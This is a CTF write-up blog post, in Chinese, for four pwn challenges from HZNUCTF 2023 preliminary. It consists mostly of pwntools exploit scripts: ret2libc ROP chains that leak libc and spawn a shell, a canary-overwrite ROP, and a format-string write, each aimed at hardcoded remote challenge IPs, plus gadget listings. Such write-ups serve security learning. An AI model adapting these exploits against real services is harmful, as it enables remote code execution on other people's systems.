Orrr

HZNUCTF 2023 preliminary 复现

发布于 2023-04-06 | 标签: fmtstr ret2libc canary PWN CTF | 6分钟 | 903字数 | 浏览量::

sign_in:
ret2libc
exp:

from pwn import *
context(log_level='debug',arch='amd64',os='linux',terminal=['tmux','splitw','-h'])

# io=process("./sign_in")
io=remote("43.143.7.127",28649)
elf=ELF("./sign_in")
libc=ELF("./libc.so")


io.recvuntil(b"here~\n")
pop_rdi_ret=0x401283
vuln=0x4011db
ret=0x40101a
payload=cyclic(0x48)+p64(pop_rdi_ret)+p64(elf.got[b"puts"])+p64(elf.plt[b"puts"])+p64(vuln)
io.sendline(payload)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
print("leak_addr:  "+hex(leak_addr))
libc_addr=leak_addr-libc.sym[b"puts"]
print("libc_addr:  "+hex(libc_addr))
sys_addr=libc_addr+libc.sym[b"system"]
str_bin_sh=libc_addr+next(libc.search(b"/bin/sh"))

io.recvuntil(b"here~\n")
payload=cyclic(0x48)+p64(ret)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(sys_addr)
io.sendline(payload)


io.interactive()


# Gadgets information
# ============================================================
# 0x000000000040127c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040127e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401280 : pop r14 ; pop r15 ; ret
# 0x0000000000401282 : pop r15 ; ret
# 0x000000000040127b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040127f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000040115d : pop rbp ; ret
# 0x0000000000401283 : pop rdi ; ret
# 0x0000000000401281 : pop rsi ; pop r15 ; ret
# 0x000000000040127d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040101a : ret

# Unique gadgets found: 11



check_in:
覆盖canary
exp:

from pwn import *
context(log_level='debug',arch='amd64',os='linux',terminal=['tmux','splitw','-h'])


# io=process("./[HZNUCTF 2023 preliminary]checkin_pwn")
io=remote("43.143.7.97",28127)
elf=ELF("./[HZNUCTF 2023 preliminary]checkin_pwn")

io.recvuntil(b"checkin\n")
bss_addr=0x4040C0
pop_rdi_ret=0x401483
payload=b"a"*0x28+p64(pop_rdi_ret)+p64(bss_addr)+p64(elf.plt[b"puts"])+b"a"*(0xf00)
io.sendline(payload)

io.interactive()

# Gadgets information
# ============================================================
# 0x000000000040147c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040147e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401480 : pop r14 ; pop r15 ; ret
# 0x0000000000401482 : pop r15 ; ret
# 0x000000000040147b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040147f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000040121d : pop rbp ; ret
# 0x0000000000401483 : pop rdi ; ret
# 0x0000000000401481 : pop rsi ; pop r15 ; ret
# 0x000000000040147d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040101a : ret

# Unique gadgets found: 11




ffmt
格式化字符串
输入有长度限制,不能直接fmtstr_payload劫持printf_got
位宽转换为地址写入栈上,注意backdoor有偏移
exp:

from pwn import *
context(log_level='debug',arch='amd64',os='linux',terminal=['tmux','splitw','-h'])

# io=process("./ffmt")
io=remote("43.142.108.3",28843)
elf=ELF("./ffmt")

shell=0x40121b
printf_got=elf.got[b"printf"]

io.sendlineafter(b"name: \n",b"%p")
addr=int(io.recv(14),16) #泄露rbp
print("addr:  "+hex(addr))

io.recvuntil(b"yourself~\n")
# payload=fmtstr_payload(8,{printf_got:shell})
payload=b"a"*2+b"%.4198945d%8$n"+p64(addr-0x10)  #写入rbp-0x10处 写入shell的对应十进制位宽可转化为shell地址,此题shell写到401221
# gdb.attach(io)
# pause()
io.sendline(payload)
 
io.interactive()




shell:
逆向稍微有点复杂,首先输入>进入子函数,空格分隔符后满足<=\x1f或者>=z即可进入存在栈溢出漏洞的输入处进行ret2libc
exp:

from pwn import *
context(log_level='debug',arch='amd64',os='linux',terminal=['tmux','splitw','-h'])


# io=process("./shell")
io=remote("43.143.7.97",28569)
elf=ELF("./shell")
libc=ELF("./libc.so")
pop_rdi_ret=0x401d13
puts_plt=elf.plt[b"puts"]
puts_got=elf.got[b"puts"]
vuln=0x401c34
ret=0x40101a

io.recvuntil(b"[haha]$")
io.sendline(b"> {")
io.recvuntil(b"name:")
payload=cyclic(0x68)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(vuln)
io.sendline(payload)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-libc.sym[b"puts"]
print("leak_addr:  "+hex(leak_addr))

sys_addr=leak_addr+libc.sym[b"system"]
str_bin_sh=leak_addr+next(libc.search(b"/bin/sh"))

# gdb.attach(io)
# pause()

io.recvuntil(b"[haha]$")
io.sendline(b"> {")
io.recvuntil(b"name:")
payload=cyclic(0x68)+p64(ret)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(sys_addr)
io.sendline(payload)
io.sendline(b"cat flag")
# print("a:  "+hex(str_bin_sh))
# print("b:  "+hex(sys_addr))
io.interactive()


# Gadgets information
# ============================================================
# 0x0000000000401d0c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401d0e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401d10 : pop r14 ; pop r15 ; ret
# 0x0000000000401d12 : pop r15 ; ret
# 0x0000000000401d0b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401d0f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000040141d : pop rbp ; ret
# 0x0000000000401a77 : pop rbx ; pop rbp ; ret
# 0x0000000000401d13 : pop rdi ; ret
# 0x0000000000401d11 : pop rsi ; pop r15 ; ret
# 0x0000000000401d0d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040101a : ret
# 0x0000000000401855 : ret 0x45c7
# 0x0000000000401593 : ret 0x8d48

# Unique gadgets found: 14
# 栈 # fmtstr # ret2libc # canary # PWN # CTF
HZNUCTF 2023 final 复现 上一篇
V&N2020_simpleheap wp 下一篇
已运行:
浏览数: | 访客数:
💤💤💤